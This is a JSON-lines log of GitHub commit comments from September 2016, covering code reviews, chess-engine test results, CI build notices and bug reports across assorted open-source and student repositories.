{"id":"4508037100","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18878880,"position":null,"line":null,"path":null,"commit_id":"3f7385a77d31f7337a5e6b6adebfb2699e854850","created_at":"2016-09-02T11:39:34Z","updated_at":"2016-09-02T11:39:34Z","body":"All 4 local tests were performed with tc=15+0.15 and Hash=4\r\n1.Test with normal builds (base bench: 8032058):\r\nScore of new vs base: 45 - 28 - 227  [0.528] 300  ELO difference: 19 \r\n\r\nThen I restarted my win-machine, updated branches to bench 7553379 and did this \r\n3 tests with pgo-builds (base results 0,2% faster with FishBench.exe), here the results:\r\nScore of new vs base:  59 - 45 - 196  [0.523] 300  ELO difference: 16.2\r\nScore of new vs base:  52 - 49 - 199  [0.505] 300  ELO difference:  3.5 \r\nScore of new vs base: 119 - 94 - 387  [0.521] 600  ELO difference: 14.5 \r\n"}},"created_at":"2016-09-02T11:39:34Z"}
{"id":"4508037274","type":"CommitCommentEvent","actor":{"login":"serjant"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18878881,"position":11,"line":186,"path":"api/views.py","commit_id":"37a36382e365227262e96baab6e4e36b7d721a86","created_at":"2016-09-02T11:39:37Z","updated_at":"2016-09-02T11:39:37Z","body":"по отчету это все заняло 3 часа"}},"created_at":"2016-09-02T11:39:37Z"}
{"id":"4508037585","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"VBakaryan/AddressBook"},"payload":{"comment":{"id":18878883,"position":34,"line":34,"path":"Lesson11_Homework/src/Controler/Program.java","commit_id":"8710357d62fab82dd0b2ff05a5da62c8766c3263","created_at":"2016-09-02T11:39:42Z","updated_at":"2016-09-02T11:39:42Z","body":"I think here we don't need this check. User can be sign in and add other user. It's normal case."}},"created_at":"2016-09-02T11:39:42Z"}
{"id":"4508042972","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"VBakaryan/AddressBook"},"payload":{"comment":{"id":18878901,"position":41,"line":41,"path":"Lesson11_Homework/src/Controler/Program.java","commit_id":"8710357d62fab82dd0b2ff05a5da62c8766c3263","created_at":"2016-09-02T11:41:10Z","updated_at":"2016-09-02T11:41:10Z","body":"Will be good if you move this check to signIn() method."}},"created_at":"2016-09-02T11:41:10Z"}
{"id":"4508043612","type":"CommitCommentEvent","actor":{"login":"geoprea1989"},"repo":{"name":"EionRobb/funyahoo-plusplus"},"payload":{"comment":{"id":18878902,"position":null,"line":null,"path":null,"commit_id":"70b3715f3386219885ec9eb8a04fcb651c2034c8","created_at":"2016-09-02T11:41:20Z","updated_at":"2016-09-02T11:41:20Z","body":"Hello EionRobb,\r\nI tried it on Windows and I receive the following message: \"Unknown error\" after I activate the account on Pidgin.\r\nHowever I believe it still logs in to Yahoo! Servers as if I enter a wrong password it throws an error accordingly.\r\nDo you know if something changed to Yahoo! Servers that might make the plugin unusable?\r\nThank you in advance,\r\nGeorge"}},"created_at":"2016-09-02T11:41:20Z"}
{"id":"4508046970","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18878913,"position":null,"line":null,"path":null,"commit_id":"10f6f2964b6649551b35e4ed0f01b90c12d71f30","created_at":"2016-09-02T11:42:12Z","updated_at":"2016-09-02T11:42:12Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 903](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12365&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-02T11:42:12Z"}
{"id":"4508048544","type":"CommitCommentEvent","actor":{"login":"Workgood"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18878923,"position":null,"line":null,"path":null,"commit_id":"566f5764ef01e342c5911cb34145d20ef50e60e9","created_at":"2016-09-02T11:42:36Z","updated_at":"2016-09-02T11:42:36Z","body":"Ожидаю:\r\nShe seemed like the model\r\ntenant. A 33-year-old nurse\r\nwho was living at the\r\nY.W.C.A. in Harlem, she had\r\ncome to rent a one-bedroom at\r\nthe still-unfinished Wilshire\r\nApartments in the Jamaica\r\nEstates neighborhood of\r\nQueens. She filled out what\r\nthe rental agent remembers as\r\na “beautiful application.”\r\nShe did not even want to look\r\nat the unit. There was just\r\none hitch: Maxine Brown was\r\nblack. Stanley Leibowitz, the\r\nrental agent, talked to his\r\nboss, Fred C. Trump. “I asked\r\nhim what to do and he says,\r\n‘Take the application and put\r\nit in a drawer and leave it\r\nthere,’” Mr. Leibowitz, now\r\n88, recalled in an interview.\r\nIt was late 1963 — just\r\nmonths before President\r\nLyndon B. Johnson signed the\r\nlandmark Civil Rights Act —\r\nand the tall, mustachioed\r\n\r\nВыводит: \r\n She seemed like the model\r\n tenant. A 33-year-old nurse\r\n who was living at the\r\n Y.W.C.A. in Harlem, she had\r\n come to rent a one-bedroom at\r\n the still-unfinished Wilshire\r\n Apartments in the Jamaica\r\n Estates neighborhood of\r\n Queens. She filled out what\r\n the rental agent remembers as\r\n a “beautiful application.”\r\n She did not even want to look\r\n at the unit. There was just\r\n one hitch: Maxine Brown was\r\n black. Stanley Leibowitz, the\r\n rental agent, talked to his\r\n boss, Fred C. Trump. “I asked\r\n him what to do and he says,\r\n ‘Take the application and put\r\n it in a drawer and leave it\r\n there,’” Mr. Leibowitz, now\r\n 88, recalled in an interview.\r\n It was late 1963 — just\r\n months before President\r\n Lyndon B. Johnson signed the\r\n landmark Civil Rights Act —\r\n and the tall, mustachioed\r\n\r\n"}},"created_at":"2016-09-02T11:42:36Z"}
{"id":"4508051226","type":"CommitCommentEvent","actor":{"login":"bntjah"},"repo":{"name":"bntjah/lancache"},"payload":{"comment":{"id":18878929,"position":null,"line":null,"path":null,"commit_id":"7e93e1b4a76fbfc79fe5e51c76a3b6b2a0fe0fae","created_at":"2016-09-02T11:43:17Z","updated_at":"2016-09-02T11:43:17Z","body":"Interesting; I thought I had every thing before but didn't know that EA had a new url.\r\nIf you add this does it actually cache and next time you download doesn't download directly from internet?"}},"created_at":"2016-09-02T11:43:17Z"}
{"id":"4508052078","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"VBakaryan/AddressBook"},"payload":{"comment":{"id":18878930,"position":125,"line":125,"path":"Lesson11_Homework/src/Controler/Program.java","commit_id":"8710357d62fab82dd0b2ff05a5da62c8766c3263","created_at":"2016-09-02T11:43:30Z","updated_at":"2016-09-02T11:43:30Z","body":"You shouldn't keep all users in memory \"userList.add(tempUser);\" each time you have to get from database"}},"created_at":"2016-09-02T11:43:30Z"}
{"id":"4508058991","type":"CommitCommentEvent","actor":{"login":"serjant"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18878946,"position":85,"line":172,"path":"api/views.py","commit_id":"265d0a6aa5df350228aad69a17a6fcc7a7c9d371","created_at":"2016-09-02T11:45:15Z","updated_at":"2016-09-02T11:45:15Z","body":"А Serializer чего не заюзал?"}},"created_at":"2016-09-02T11:45:15Z"}
{"id":"4508060151","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"mstembera/Stockfish"},"payload":{"comment":{"id":18878949,"position":null,"line":null,"path":null,"commit_id":"6e5c07abdd9aa423393e706ff9d8298f4fe42cb8","created_at":"2016-09-02T11:45:34Z","updated_at":"2016-09-02T11:45:34Z","body":"Yes, I agree that that's really something to be pondered later on anyway.\r\n(By the way I believe it could be calculated entirely in pawns.cpp)\r\nI'm going to measure the speedup when I have time..."}},"created_at":"2016-09-02T11:45:34Z"}
{"id":"4508060427","type":"CommitCommentEvent","actor":{"login":"Workgood"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18878951,"position":null,"line":null,"path":null,"commit_id":"566f5764ef01e342c5911cb34145d20ef50e60e9","created_at":"2016-09-02T11:45:39Z","updated_at":"2016-09-02T11:45:39Z","body":"Только где \"Выводит\" перед каждым первым словом в строке стоит пробел( _ )"}},"created_at":"2016-09-02T11:45:39Z"}
{"id":"4508060617","type":"CommitCommentEvent","actor":{"login":"serjant"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18878952,"position":14,"line":53,"path":"backend/models.py","commit_id":"265d0a6aa5df350228aad69a17a6fcc7a7c9d371","created_at":"2016-09-02T11:45:41Z","updated_at":"2016-09-02T11:45:41Z","body":"И?"}},"created_at":"2016-09-02T11:45:41Z"}
{"id":"4508060654","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"VBakaryan/AddressBook"},"payload":{"comment":{"id":18878953,"position":161,"line":161,"path":"Lesson11_Homework/src/Controler/Program.java","commit_id":"8710357d62fab82dd0b2ff05a5da62c8766c3263","created_at":"2016-09-02T11:45:42Z","updated_at":"2016-09-02T11:45:42Z","body":"You don't need here user variable because you have signedInUser \"currentUser\" as a static class member. "}},"created_at":"2016-09-02T11:45:42Z"}
{"id":"4508061374","type":"CommitCommentEvent","actor":{"login":"serjant"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18878955,"position":14,"line":122,"path":"api/serializers.py","commit_id":"265d0a6aa5df350228aad69a17a6fcc7a7c9d371","created_at":"2016-09-02T11:45:54Z","updated_at":"2016-09-02T11:45:54Z","body":"И?"}},"created_at":"2016-09-02T11:45:54Z"}
{"id":"4508061500","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"VBakaryan/AddressBook"},"payload":{"comment":{"id":18878956,"position":170,"line":170,"path":"Lesson11_Homework/src/Controler/Program.java","commit_id":"8710357d62fab82dd0b2ff05a5da62c8766c3263","created_at":"2016-09-02T11:45:56Z","updated_at":"2016-09-02T11:45:56Z","body":"ou don't need here user variable because you have signedInUser \"currentUser\" as a static class member."}},"created_at":"2016-09-02T11:45:56Z"}
{"id":"4508064097","type":"CommitCommentEvent","actor":{"login":"LYDXY"},"repo":{"name":"LYDXY/QiCheZuLin"},"payload":{"comment":{"id":18878960,"position":null,"line":null,"path":null,"commit_id":"bf331a368158123bd90289769bab1511ac76a157","created_at":"2016-09-02T11:46:34Z","updated_at":"2016-09-02T11:46:34Z","body":"个"}},"created_at":"2016-09-02T11:46:34Z"}
{"id":"4508065940","type":"CommitCommentEvent","actor":{"login":"andreasohlund"},"repo":{"name":"Particular/NServiceBus"},"payload":{"comment":{"id":18878963,"position":22,"line":102,"path":"src/NServiceBus.Core/DelayedDelivery/TimeoutManager/ExpiredTimeoutsPoller.cs","commit_id":"4d73e137ad9a147eb54d0cefa80479b81e1f1225","created_at":"2016-09-02T11:47:04Z","updated_at":"2016-09-02T11:47:04Z","body":"Got it now, it could indeed generate some extra dispatches if we abort in the middle of a batch"}},"created_at":"2016-09-02T11:47:04Z"}
{"id":"4508066852","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18878965,"position":null,"line":null,"path":null,"commit_id":"3f7385a77d31f7337a5e6b6adebfb2699e854850","created_at":"2016-09-02T11:47:18Z","updated_at":"2016-09-02T11:47:18Z","body":"Both base and test have same bench."}},"created_at":"2016-09-02T11:47:18Z"}
{"id":"4508067063","type":"CommitCommentEvent","actor":{"login":"brusch"},"repo":{"name":"pimcore/pimcore"},"payload":{"comment":{"id":18878966,"position":null,"line":null,"path":null,"commit_id":"81f04913eebb9fce8090972bd700f3ad7bad674a","created_at":"2016-09-02T11:47:22Z","updated_at":"2016-09-02T11:47:22Z","body":"@cleggypdc yes, they are stored in the same folder. \r\n\r\nI think the following `gitignore` should do it:\r\n\r\n```\r\n!website/var/\r\nwebsite/var/*\r\n!website/var/classes/\r\nwebsite/var/classes/Object\r\n```"}},"created_at":"2016-09-02T11:47:22Z"}
{"id":"4508068044","type":"CommitCommentEvent","actor":{"login":"e02d96ec16"},"repo":{"name":"joeferraro/MavensMate"},"payload":{"comment":{"id":18878968,"position":null,"line":null,"path":null,"commit_id":"065751f54cee11a9f7776a728d18288d17cab13d","created_at":"2016-09-02T11:47:39Z","updated_at":"2016-09-02T11:47:39Z","body":"Adorable :heart_eyes:. Who made them. Are they still under the same licence (GNU)?\r\n~~alsowhynotsvg~~"}},"created_at":"2016-09-02T11:47:39Z"}
{"id":"4508068053","type":"CommitCommentEvent","actor":{"login":"serjant"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18878969,"position":23,"line":108,"path":"api/views.py","commit_id":"99b769398088907a00138f37b5dcfd52cca54083","created_at":"2016-09-02T11:47:39Z","updated_at":"2016-09-02T11:47:39Z","body":"Reset password перестал работал после этого, просто новый не заносился в базу"}},"created_at":"2016-09-02T11:47:39Z"}
{"id":"4508071097","type":"CommitCommentEvent","actor":{"login":"ShikherVerma"},"repo":{"name":"Mayankm96/auv-iitk.github.io"},"payload":{"comment":{"id":18878986,"position":null,"line":null,"path":null,"commit_id":"ddf5d57be69340f31a10d647ef5301914905890f","created_at":"2016-09-02T11:48:29Z","updated_at":"2016-09-02T11:48:29Z","body":"boooo ! this sucks."}},"created_at":"2016-09-02T11:48:29Z"}
{"id":"4508072834","type":"CommitCommentEvent","actor":{"login":"serjant"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18878994,"position":74,"line":139,"path":"api/views.py","commit_id":"99b769398088907a00138f37b5dcfd52cca54083","created_at":"2016-09-02T11:48:55Z","updated_at":"2016-09-02T11:48:55Z","body":"Задание было - сделать response 400, если неизвестный параметр - здесь просто перестановка if...else, и save user"}},"created_at":"2016-09-02T11:48:55Z"}
{"id":"4508072931","type":"CommitCommentEvent","actor":{"login":"harshinichowdary"},"repo":{"name":"harshinichowdary/momspage"},"payload":{"comment":{"id":18878995,"position":null,"line":null,"path":null,"commit_id":"20a0f5dc4ab2d433da488aa22d11362e4282cd9d","created_at":"2016-09-02T11:48:57Z","updated_at":"2016-09-02T11:48:57Z","body":"![untitled](https://cloud.githubusercontent.com/assets/21881645/18202883/cab21944-7130-11e6-8751-2e585777661a.png)\r\n## love you \r\n> mom u are the best ``"}},"created_at":"2016-09-02T11:48:57Z"}
{"id":"4508073912","type":"CommitCommentEvent","actor":{"login":"bmwiedemann"},"repo":{"name":"SUSE-Cloud/automation"},"payload":{"comment":{"id":18878997,"position":9,"line":3482,"path":"scripts/qa_crowbarsetup.sh","commit_id":"8707ea2647acec5409504b697d31a9a8b04bf95d","created_at":"2016-09-02T11:49:12Z","updated_at":"2016-09-02T11:49:12Z","body":"This wait is not working as intended, because it is running the service-list only once and then 200 times comparing the result to 5, so either it passes on first try or never."}},"created_at":"2016-09-02T11:49:12Z"}
{"id":"4508074614","type":"CommitCommentEvent","actor":{"login":"serjant"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18879000,"position":null,"line":null,"path":null,"commit_id":"2442794364be50e2c81c52db95cb8223710bdc3b","created_at":"2016-09-02T11:49:21Z","updated_at":"2016-09-02T11:49:21Z","body":"Этот коммит занимал 5 дней?"}},"created_at":"2016-09-02T11:49:21Z"}
{"id":"4508075190","type":"CommitCommentEvent","actor":{"login":"LYDXY"},"repo":{"name":"LYDXY/QiCheZuLin"},"payload":{"comment":{"id":18879002,"position":null,"line":null,"path":null,"commit_id":"b4297e194a8fb5007c2cb49ea72afe4b29b5480e","created_at":"2016-09-02T11:49:30Z","updated_at":"2016-09-02T11:49:30Z","body":"9"}},"created_at":"2016-09-02T11:49:30Z"}
{"id":"4508078897","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"VBakaryan/AddressBook"},"payload":{"comment":{"id":18879010,"position":251,"line":251,"path":"Lesson11_Homework/src/Controler/Program.java","commit_id":"8710357d62fab82dd0b2ff05a5da62c8766c3263","created_at":"2016-09-02T11:50:30Z","updated_at":"2016-09-02T11:50:30Z","body":"getProperties and getMessage methods you can move to util class e.g. MessageUtil"}},"created_at":"2016-09-02T11:50:30Z"}
{"id":"4508079071","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18879011,"position":null,"line":null,"path":null,"commit_id":"3f7385a77d31f7337a5e6b6adebfb2699e854850","created_at":"2016-09-02T11:50:33Z","updated_at":"2016-09-02T11:50:33Z","body":"@ajithcj yes, that's correct and expected."}},"created_at":"2016-09-02T11:50:33Z"}
{"id":"4508081194","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"VBakaryan/AddressBook"},"payload":{"comment":{"id":18879014,"position":15,"line":15,"path":"Lesson11_Homework/src/Controler/StaticVariables.java","commit_id":"8710357d62fab82dd0b2ff05a5da62c8766c3263","created_at":"2016-09-02T11:51:05Z","updated_at":"2016-09-02T11:51:05Z","body":"You don't need keep all users in app memory \r\npublic static List<User> userList = new ArrayList<>();"}},"created_at":"2016-09-02T11:51:05Z"}
{"id":"4508082006","type":"CommitCommentEvent","actor":{"login":"AayushRd7"},"repo":{"name":"karthick111/android_device_yu_tomato"},"payload":{"comment":{"id":18879015,"position":null,"line":null,"path":null,"commit_id":"b8cc675ccebd28f386b39ab3c327c80552c3fcf9","created_at":"2016-09-02T11:51:17Z","updated_at":"2016-09-02T11:51:17Z","body":"Sexy!"}},"created_at":"2016-09-02T11:51:17Z"}
{"id":"4508083225","type":"CommitCommentEvent","actor":{"login":"cleggypdc"},"repo":{"name":"pimcore/pimcore"},"payload":{"comment":{"id":18879017,"position":null,"line":null,"path":null,"commit_id":"81f04913eebb9fce8090972bd700f3ad7bad674a","created_at":"2016-09-02T11:51:36Z","updated_at":"2016-09-02T11:51:36Z","body":"Cheers!"}},"created_at":"2016-09-02T11:51:36Z"}
{"id":"4508084250","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"VBakaryan/AddressBook"},"payload":{"comment":{"id":18879024,"position":16,"line":16,"path":"Lesson11_Homework/src/DataLayer/UserRepository.java","commit_id":"8710357d62fab82dd0b2ff05a5da62c8766c3263","created_at":"2016-09-02T11:51:53Z","updated_at":"2016-09-02T11:51:53Z","body":"if this user already exists you should throw exception"}},"created_at":"2016-09-02T11:51:53Z"}
{"id":"4508085010","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18879028,"position":null,"line":null,"path":null,"commit_id":"10f6f2964b6649551b35e4ed0f01b90c12d71f30","created_at":"2016-09-02T11:52:08Z","updated_at":"2016-09-02T11:52:08Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 903](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12365&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:09:56"}},"created_at":"2016-09-02T11:52:08Z"}
{"id":"4508085180","type":"CommitCommentEvent","actor":{"login":"tomalec"},"repo":{"name":"StarcounterPrefabs/Launcher"},"payload":{"comment":{"id":18879030,"position":null,"line":null,"path":null,"commit_id":"39da52caab8b6f9275d05d97d0e4cac6794d71d0","created_at":"2016-09-02T11:52:10Z","updated_at":"2016-09-02T11:52:10Z","body":"It seems this commit introduced a strange bug between apps https://github.com/StarcounterSamples/Products/issues/29"}},"created_at":"2016-09-02T11:52:10Z"}
{"id":"4508085927","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"VBakaryan/AddressBook"},"payload":{"comment":{"id":18879032,"position":8,"line":8,"path":"Lesson11_Homework/src/bin/PhoneNumber.java","commit_id":"8710357d62fab82dd0b2ff05a5da62c8766c3263","created_at":"2016-09-02T11:52:21Z","updated_at":"2016-09-02T11:52:21Z","body":"You can keep also phoneId"}},"created_at":"2016-09-02T11:52:21Z"}
{"id":"4508086374","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18879034,"position":null,"line":null,"path":null,"commit_id":"d64175143d494fcba7b6862ae642f1d1744546ab","created_at":"2016-09-02T11:52:28Z","updated_at":"2016-09-02T11:52:28Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#SLlRI-BOQ7OUtzUadiI9Vw"}},"created_at":"2016-09-02T11:52:28Z"}
{"id":"4508088140","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"VBakaryan/AddressBook"},"payload":{"comment":{"id":18879041,"position":14,"line":15,"path":"Lesson11_Homework/src/bin/User.java","commit_id":"8710357d62fab82dd0b2ff05a5da62c8766c3263","created_at":"2016-09-02T11:52:55Z","updated_at":"2016-09-02T11:52:55Z","body":"userId shouldn't be static"}},"created_at":"2016-09-02T11:52:55Z"}
{"id":"4508089778","type":"CommitCommentEvent","actor":{"login":"serjant"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18879047,"position":null,"line":null,"path":null,"commit_id":"99b769398088907a00138f37b5dcfd52cca54083","created_at":"2016-09-02T11:53:20Z","updated_at":"2016-09-02T11:53:20Z","body":"Это все заняло два дня у тебя - молодец гребец"}},"created_at":"2016-09-02T11:53:20Z"}
{"id":"4508091492","type":"CommitCommentEvent","actor":{"login":"CvH"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18879049,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-02T11:53:47Z","updated_at":"2016-09-02T11:53:47Z","body":"I have currently only a J1900, the i5 and the xeon is without intel gpu so I can't test it there.\r\nBtw don't expect that all cores go to max till you reach the limit of your cpu. \r\nX264/5 isn't that perfect to fill the cpu at fast and similar settings. 50% of 100% could already be max out."}},"created_at":"2016-09-02T11:53:47Z"}
{"id":"4508093407","type":"CommitCommentEvent","actor":{"login":"serjant"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18879053,"position":null,"line":null,"path":null,"commit_id":"37a36382e365227262e96baab6e4e36b7d721a86","created_at":"2016-09-02T11:54:18Z","updated_at":"2016-09-02T11:54:18Z","body":"Почему 5 дней отсутсвовал?"}},"created_at":"2016-09-02T11:54:18Z"}
{"id":"4508093497","type":"CommitCommentEvent","actor":{"login":"MrKepzie"},"repo":{"name":"MrKepzie/Natron"},"payload":{"comment":{"id":18879054,"position":null,"line":null,"path":null,"commit_id":"dd32a6a5edeb677b9754b6ff8bbe3372eed8662f","created_at":"2016-09-02T11:54:19Z","updated_at":"2016-09-02T11:54:19Z","body":"Then use as recommended here for Windows https://github.com/devernay/openfx/blob/master/HostSupport/src/ofxhPluginCache.cpp#L191\r\n\r\non Mac GenericDataLocation seems to fit. \r\n\r\n"}},"created_at":"2016-09-02T11:54:19Z"}
{"id":"4508096483","type":"CommitCommentEvent","actor":{"login":"fangyubo"},"repo":{"name":"fangyubo/Yu"},"payload":{"comment":{"id":18879063,"position":null,"line":null,"path":null,"commit_id":"9029b82666408570189619430497dc0766a7f863","created_at":"2016-09-02T11:55:05Z","updated_at":"2016-09-02T11:55:05Z","body":"sdfsajdf\r\ndsafas"}},"created_at":"2016-09-02T11:55:05Z"}
{"id":"4508098080","type":"CommitCommentEvent","actor":{"login":"Catzenjaeger"},"repo":{"name":"Catzenjaeger/FigureLib_4"},"payload":{"comment":{"id":18879065,"position":null,"line":null,"path":null,"commit_id":"190fbd139518ca25a00da65c70a45cf33e1c9cd6","created_at":"2016-09-02T11:55:31Z","updated_at":"2016-09-02T11:55:31Z","body":"it dosent work :("}},"created_at":"2016-09-02T11:55:31Z"}
{"id":"4508098105","type":"CommitCommentEvent","actor":{"login":"kasiveyser"},"repo":{"name":"kasiveyser/aaa"},"payload":{"comment":{"id":18879066,"position":null,"line":null,"path":null,"commit_id":"238e45489a101b3e9cd743a507f9af395489f206","created_at":"2016-09-02T11:55:31Z","updated_at":"2016-09-02T11:55:31Z","body":"Не исключено"}},"created_at":"2016-09-02T11:55:31Z"}
{"id":"4508099049","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"MikayelSmbatian/TellPhoneBookSkeleton"},"payload":{"comment":{"id":18879068,"position":8,"line":8,"path":"src/UserClass/User.java","commit_id":"f428bc505814fcdbfa2275ea669f30366834ea7d","created_at":"2016-09-02T11:55:46Z","updated_at":"2016-09-02T11:55:46Z","body":"The User bean also should has \r\nid\r\nfriends\r\naddresses "}},"created_at":"2016-09-02T11:55:46Z"}
{"id":"4508099066","type":"CommitCommentEvent","actor":{"login":"maziminke"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18879067,"position":4,"line":53,"path":"application/views/survey/questions/multiplechoice_with_comments/rows/answer_row_other.php","commit_id":"5af219fdc56a66ed1c548acded66c6cdec3e5d48","created_at":"2016-09-02T11:55:46Z","updated_at":"2016-09-02T11:55:46Z","body":"Nice one ;-)"}},"created_at":"2016-09-02T11:55:46Z"}
{"id":"4508100230","type":"CommitCommentEvent","actor":{"login":"zjhmale"},"repo":{"name":"rikvdkleij/intellij-haskell"},"payload":{"comment":{"id":18879071,"position":null,"line":null,"path":null,"commit_id":"b9c77924a07d22162e931590d0cf9d464a8373f7","created_at":"2016-09-02T11:56:06Z","updated_at":"2016-09-02T11:56:06Z","body":"cool, i'll checkout then, thx!"}},"created_at":"2016-09-02T11:56:06Z"}
{"id":"4508100842","type":"CommitCommentEvent","actor":{"login":"olear"},"repo":{"name":"MrKepzie/Natron"},"payload":{"comment":{"id":18879074,"position":null,"line":null,"path":null,"commit_id":"dd32a6a5edeb677b9754b6ff8bbe3372eed8662f","created_at":"2016-09-02T11:56:17Z","updated_at":"2016-09-02T11:56:17Z","body":"Will do."}},"created_at":"2016-09-02T11:56:17Z"}
{"id":"4508101013","type":"CommitCommentEvent","actor":{"login":"davag"},"repo":{"name":"TemenosDS/DS-ESON"},"payload":{"comment":{"id":18879075,"position":29,"line":91,"path":"tests/org.eclipse.emf.eson.tests/src/org/eclipse/emf/eson/serialization/tests/Serialization2Test.java","commit_id":"c50cd9227fc53660c91bd6031321dc4f152d25a5","created_at":"2016-09-02T11:56:20Z","updated_at":"2016-09-02T11:56:20Z","body":"It would be interesting to have a comment about generating a model in-memory as this model cannot be validated by EMF\r\n"}},"created_at":"2016-09-02T11:56:20Z"}
{"id":"4508101429","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"MikayelSmbatian/TellPhoneBookSkeleton"},"payload":{"comment":{"id":18879076,"position":1,"line":1,"path":"src/UserClass/User.java","commit_id":"f428bc505814fcdbfa2275ea669f30366834ea7d","created_at":"2016-09-02T11:56:26Z","updated_at":"2016-09-02T11:56:26Z","body":"package name shouldn't be contain upper case.\r\npackage UserClass; -> package bean;"}},"created_at":"2016-09-02T11:56:26Z"}
{"id":"4508102295","type":"CommitCommentEvent","actor":{"login":"davag"},"repo":{"name":"TemenosDS/DS-ESON"},"payload":{"comment":{"id":18879077,"position":56,"line":118,"path":"tests/org.eclipse.emf.eson.tests/src/org/eclipse/emf/eson/serialization/tests/Serialization2Test.java","commit_id":"c50cd9227fc53660c91bd6031321dc4f152d25a5","created_at":"2016-09-02T11:56:40Z","updated_at":"2016-09-02T11:56:40Z","body":"This is not a BookStore example"}},"created_at":"2016-09-02T11:56:40Z"}
{"id":"4508105956","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"MikayelSmbatian/TellPhoneBookSkeleton"},"payload":{"comment":{"id":18879082,"position":1,"line":1,"path":"src/MainClass.java","commit_id":"f428bc505814fcdbfa2275ea669f30366834ea7d","created_at":"2016-09-02T11:57:40Z","updated_at":"2016-09-02T11:57:40Z","body":"Who is this class?"}},"created_at":"2016-09-02T11:57:40Z"}
{"id":"4508106985","type":"CommitCommentEvent","actor":{"login":"ophthal"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":18879083,"position":null,"line":null,"path":null,"commit_id":"37668908f9234db55ff04fb22e3d17b8c7114488","created_at":"2016-09-02T11:57:54Z","updated_at":"2016-09-02T11:57:54Z","body":"I am not the best at user-interfaces, especially a design’s look and feel.  \nWhen faced with such issues, whether it is a GUI or a kitchen remodel, I defer to others, \nunless it is really ugly, then I speak up…\nThat said,  I do not like the orange on the login page, and will play around with this central square idea.\nNo promises though…  Feel free to create your own.  \nIt’s like the logo itself - this should be professional and by consensus, especially if it is going to be around until openEMR  6.0\n\n \n> On Sep 2, 2016, at 6:55 AM, Brady Miller <notifications@github.com> wrote:\n> \n> Also, regarding the login page, what are your thought of making everything white around the central current login square there and then placing the logos within the current login square only(and with a white background).\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/ophthal/openEMR_2/commit/37668908f9234db55ff04fb22e3d17b8c7114488#commitcomment-18878454>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AAfDcBK78l8zO7VngLGjIpQWt9MVbKq7ks5qmAC8gaJpZM4Jzl32>.\n> \n\n"}},"created_at":"2016-09-02T11:57:54Z"}
{"id":"4508108973","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"MikayelSmbatian/TellPhoneBookSkeleton"},"payload":{"comment":{"id":18879086,"position":58,"line":58,"path":"src/ControlerPack/Controller.java","commit_id":"f428bc505814fcdbfa2275ea669f30366834ea7d","created_at":"2016-09-02T11:58:25Z","updated_at":"2016-09-02T11:58:25Z","body":"You don't need keep static controller member here."}},"created_at":"2016-09-02T11:58:25Z"}
